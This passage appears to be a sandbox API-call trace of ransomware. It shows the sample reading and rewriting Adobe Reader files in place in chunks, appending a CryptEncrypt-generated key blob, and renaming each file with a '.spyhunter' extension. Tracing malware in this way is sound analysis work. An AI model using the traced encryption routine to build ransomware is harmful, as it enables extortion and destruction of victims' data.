lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.445] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.446] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.446] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.446] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.447] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.447] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.447] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.448] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.448] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.448] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.450] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.450] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.450] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.469] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.469] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.470] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.470] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.470] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.471] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.471] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.471] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.472] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.472] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.472] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.472] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.473] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.473] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.473] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.474] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.474] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.474] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.475] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.475] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.475] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.476] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.476] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.476] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.477] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.477] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.477] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.478] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.478] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.478] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.479] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.479] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.479] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.480] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.480] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.480] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.481] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.481] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.481] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.482] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.482] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x2800, lpOverlapped=0x0) returned 1 [0180.482] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e2ac*=0x29c, lpOverlapped=0x0) returned 1 [0180.483] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.483] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e2ac*=0x29c, lpOverlapped=0x0) returned 1 [0180.483] GetProcessHeap () returned 0x2c0000 [0180.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0180.483] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.483] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x248e2ec*, lpNumberOfBytesWritten=0x248e2ac*=0x4, lpOverlapped=0x0) returned 1 [0180.483] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2ac*=0x30, lpOverlapped=0x0) returned 1 [0180.483] CloseHandle (hObject=0xa0) returned 1 [0180.483] GetProcessHeap () returned 0x2c0000 [0180.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.484] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.spyhunter") returned 115 [0180.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt.spyhunter")) returned 1 [0180.485] GetProcessHeap () returned 0x2c0000 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.485] GetProcessHeap () returned 0x2c0000 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.485] GetProcessHeap () returned 0x2c0000 [0180.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89ae0 | out: hHeap=0x2c0000) returned 1 [0180.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2e8 | out: pbBuffer=0x248e2e8) returned 1 [0180.486] GetProcessHeap () returned 0x2c0000 [0180.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2e0*=0x30) returned 1 [0180.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.498] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp") returned 101 [0180.498] StrStrW (lpFirst="usa03.hsp", lpSrch=".txt") returned 0x0 [0180.498] GetProcessHeap () returned 0x2c0000 [0180.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0180.498] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e2a4*=0x2800, lpOverlapped=0x0) returned 1 [0180.598] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.598] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e2a4*=0x2800, lpOverlapped=0x0) returned 1 [0180.598] GetProcessHeap () returned 0x2c0000 [0180.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0180.602] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.602] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x248e2e4*, lpNumberOfBytesWritten=0x248e2a4*=0x4, lpOverlapped=0x0) returned 1 [0180.603] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2a4*=0x30, lpOverlapped=0x0) returned 1 [0180.603] CloseHandle (hObject=0xa0) returned 1 [0180.604] GetProcessHeap () returned 0x2c0000 [0180.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0180.604] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.spyhunter") returned 111 [0180.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp.spyhunter")) returned 1 [0180.605] GetProcessHeap () returned 0x2c0000 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0180.605] GetProcessHeap () returned 0x2c0000 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.605] GetProcessHeap () returned 0x2c0000 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1158 | out: hHeap=0x2c0000) returned 1 [0180.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2e8 | out: pbBuffer=0x248e2e8) returned 1 [0180.606] GetProcessHeap () returned 0x2c0000 [0180.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2e0*=0x30) returned 1 [0180.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.611] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp") returned 102 [0180.611] StrStrW (lpFirst="tur111.hsp", lpSrch=".txt") returned 0x0 [0180.611] GetProcessHeap () returned 0x2c0000 [0180.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.611] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e2a4*=0x2800, lpOverlapped=0x0) returned 1 [0180.697] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.698] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e2a4*=0x2800, lpOverlapped=0x0) returned 1 [0180.698] GetProcessHeap () returned 0x2c0000 [0180.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.698] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.698] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x248e2e4*, lpNumberOfBytesWritten=0x248e2a4*=0x4, lpOverlapped=0x0) returned 1 [0180.805] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e2a4*=0x30, lpOverlapped=0x0) returned 1 [0180.806] CloseHandle (hObject=0xa0) returned 1 [0180.806] GetProcessHeap () returned 0x2c0000 [0180.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.806] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.spyhunter") returned 112 [0180.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp.spyhunter")) returned 1 [0180.807] GetProcessHeap () returned 0x2c0000 [0180.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.807] GetProcessHeap () returned 0x2c0000 [0180.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0180.807] GetProcessHeap () returned 0x2c0000 [0180.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee0e10 | out: hHeap=0x2c0000) returned 1 [0180.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e2e0 | out: pbBuffer=0x248e2e0) returned 1 [0180.807] GetProcessHeap () returned 0x2c0000 [0180.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0180.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e2d8*=0x30) returned 1 [0180.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.808] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca") returned 99 [0180.808] StrStrW (lpFirst="swd.fca", lpSrch=".txt") returned 0x0 [0180.808] GetProcessHeap () returned 0x2c0000 [0180.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.808] ReadFile (hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e29c, lpOverlapped=0x0) Thread: id = 7 os_tid = 0xac4 